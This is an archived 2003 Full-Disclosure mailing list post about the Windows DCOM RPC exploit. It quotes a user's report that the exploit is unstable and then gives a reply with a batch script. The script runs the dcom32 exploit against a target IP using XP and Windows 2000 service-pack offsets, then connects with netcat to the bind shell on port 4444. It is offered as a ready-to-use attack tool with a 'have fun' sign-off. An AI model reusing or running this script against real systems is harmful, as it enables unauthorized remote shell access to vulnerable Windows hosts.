| lists.openwall.net | lists / announce owl-users owl-dev john-users john-dev passwdqc-users yescrypt popa3d-users / oss-security kernel-hardening musl sabotage tlsify passwords / crypt-dev xvendor / Bugtraq Full-Disclosure linux-kernel linux-netdev linux-ext4 linux-hardening linux-cve-announce PHC | |
|
Open Source and information security mailing list archives
| ||
|
From: se_cur_ity at hotmail.com (morning_wood) Subject: dcom exploit code observations ----- Original Message ----- From: "john" <seclist@...esec.net> To: <full-disclosure@...ts.netsys.com> Sent: Monday, July 28, 2003 7:42 AM Subject: [Full-Disclosure] dcom exploit code observations > Downloaded the revised exploit code by HD moore and got it compiled on a > linux box. > > There seems to either be some flaws in the exploit code or just a > general instability of the rpc service. > > If the code is run against a vulnerable box and the right SP level > setting is not correct it crashes the rpc service and shuts down the > port. Restarting the service will bring it back online. If the attack is > successful you get a nice pretty windows shell. If you exit the shell > the rpc service again crashes. > > I am sure the code will be revised to eliminate these problems. > > John > THIS IS NOT THE CASE... this .bat works perfect... ------------ snip ------------------- @echo on @echo ..................................................... @echo RPC script by morning_wood @echo .................................................... wait @echo ... @echo trying XP Service Pack 0 dcom32 5 %1 nc -v -n %1 4444 wait @echo trying XP Service Pack 1 dcom32 6 %1 nc -v -n %1 4444 wait @echo trying 2K Service Pack 4 dcom32 4 %1 nc -v -n %1 4444 wait @echo ........... have fun wait @echo bye now exit -------- snip ------------------- w00d
Powered by blists - more mailing lists